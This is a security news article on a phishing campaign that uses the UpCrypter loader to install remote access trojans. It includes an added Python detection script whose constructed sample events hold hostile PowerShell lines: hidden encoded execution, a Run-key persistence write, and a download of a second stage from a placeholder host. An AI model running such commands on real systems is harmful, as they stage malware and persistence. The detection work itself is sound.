New Phishing Attack Deploys RATs Using UpCrypter Evasion

▼ Summary
– A global phishing campaign uses personalized emails with HTML attachments that redirect to fake websites customized with each recipient’s email address and company logo.
– The attack delivers a ZIP archive containing obfuscated JavaScript, which executes PowerShell commands to evade detection and retrieve further payloads from attacker-controlled servers.
– The custom loader UpCrypter checks for forensic tools and virtual environments, forces system restarts if analysis is suspected, and downloads additional malware components while establishing persistence.
– Final payloads include remote access tools like PureHVNC, DCRat, and Babylon RAT, enabling keylogging, file theft, and full remote control of compromised systems.
– The campaign is rapidly expanding, targeting industries such as manufacturing, technology, and healthcare, and is described as a sophisticated attack chain rather than a simple credential theft scheme.
A sophisticated global phishing operation has been identified, using highly personalized emails and counterfeit websites to distribute malicious downloads. Security experts warn that this campaign employs a custom loader known as UpCrypter to deploy multiple remote access trojans (RATs), enabling prolonged unauthorized access to infected systems.
The attack begins with targeted phishing emails containing HTML attachments. These attachments redirect users to fake websites that have been carefully crafted to appear legitimate. The sites often include the recipient’s email address and may even display their company logo, making the deception more convincing.
Several variations of this campaign have been observed. One version uses a voicemail-themed email, falsely informing the recipient of a missed call and prompting them to open an HTML file. Another variant, written in Chinese, mimics a purchase order and similarly leads to a malicious site through an embedded HTML attachment.
Once redirected, victims are encouraged to download a ZIP file housing an obfuscated JavaScript payload. This script then executes PowerShell commands designed to evade detection mechanisms and fetch additional malicious components from remote servers controlled by the attackers. In some instances, data is concealed within image files using steganography to further bypass security scans.
Central to this operation is UpCrypter, a custom loader that has been publicly promoted by its developer. Before executing, the malware conducts checks for the presence of forensic tools, virtual machines, or sandbox environments. If it detects any signs of analysis, it triggers a system reboot to disrupt investigation efforts. Once it confirms a suitable environment, UpCrypter proceeds to download and execute additional payloads directly in memory, while also modifying registry keys to ensure persistence.
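The delivery chain described in the two paragraphs above (obfuscated JavaScript spawning PowerShell, which fetches further stages, decodes them in memory and writes registry persistence) leaves a characteristic footprint in process-creation telemetry. The triage script below is an added example and is not code from the article or from the researchers who analysed the campaign. It assumes that the campaign's JavaScript runs under the Windows Script Host (wscript.exe/cscript.exe), which the article does not state, that Sysmon-style process-creation events are available as parent image, image and command line, and that the persistence mechanism is a CurrentVersion\Run key (the article only says "registry keys"). All sample events, the base64 blob and the URL are constructed.

```python
"""Triage of process-creation events for a script-host -> PowerShell loader chain.

Added example, not from the article. Assumptions: JavaScript executes via
wscript.exe/cscript.exe; events look like Sysmon Event ID 1; persistence
is a CurrentVersion\\Run value. Sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # assumed JS execution hosts
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line traits typical of a downloader stage: evasion switches,
# remote fetch, in-memory decode and Run-key persistence.
SUSPICIOUS_PS_PATTERNS = [
    (r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s", "encoded command"),
    (r"(?i)(^|\s)-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)(^|\s)-(ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"(?i)(^|\s)-nop(rofile)?\b", "no profile"),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient", "remote fetch"),
    (r"(?i)frombase64string|\[system\.drawing", "in-memory decode"),
    (r"(?i)currentversion\\run\b", "run-key write"),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def severity(findings: list) -> str:
    """Script host -> PowerShell plus any other trait is the strongest signal."""
    if not findings:
        return "none"
    if "script host spawned powershell" in findings:
        return "high" if len(findings) > 1 else "medium"
    if "run-key write" in findings or len(findings) >= 2:
        return "medium"
    return "low"


def score_event(ev: ProcEvent) -> dict:
    """Return matched traits and a severity for one process-creation event."""
    findings = []
    if basename(ev.image) in POWERSHELL:
        if basename(ev.parent_image) in SCRIPT_HOSTS:
            findings.append("script host spawned powershell")
        for pattern, label in SUSPICIOUS_PS_PATTERNS:
            if re.search(pattern, ev.command_line):
                findings.append(label)
    return {"image": ev.image, "findings": findings, "severity": severity(findings)}


def analyze(events) -> list:
    """Score a batch of events; callers typically filter on severity."""
    return [score_event(ev) for ev in events]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events: the base64 blob decodes to "ABC" (UTF-16LE),
# the URL host is a reserved placeholder domain.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS,
              r"powershell.exe -nop -w hidden -ep bypass -enc QQBCAEMA"),
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              r'powershell.exe -NoProfile -Command "Get-Date"'),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              r'powershell.exe -Command "Set-ItemProperty -Path '
              r'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run '
              r'-Name Updater -Value C:\Users\Public\u.exe"'),
    ProcEvent(r"C:\Windows\System32\cscript.exe", PS,
              r'powershell.exe -w hidden -c "Invoke-WebRequest '
              r'-Uri http://placeholder.invalid/stage2 -OutFile C:\Users\Public\s2.dat"'),
]


if __name__ == "__main__":
    for result in analyze(SAMPLE_EVENTS):
        print(result["severity"].upper().ljust(7), result["image"], result["findings"])
```

The parent/child pairing carries most of the weight: a script host spawning PowerShell is rare in normal office use, while single switches such as `-NoProfile` (the second sample) are common in legitimate administration and are deliberately ranked low so the rule does not flood the queue.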
Final-stage malware observed in these attacks includes tools like PureHVNC, DCRat, and Babylon RAT. These RATs provide attackers with extensive capabilities, including keylogging, file exfiltration, and complete remote control over compromised devices.
The campaign is rapidly expanding, with detection rates doubling within a two-week period. Sectors most heavily impacted include manufacturing, technology, healthcare, construction, and retail/hospitality. Researchers emphasize that this is not a simple credential-harvesting operation but a multi-stage intrusion designed to embed advanced malware within corporate networks.
Organizations are urged to implement robust email filtering solutions and conduct regular employee training to improve awareness and resilience against such evolving threats.
(Source: Info Security)
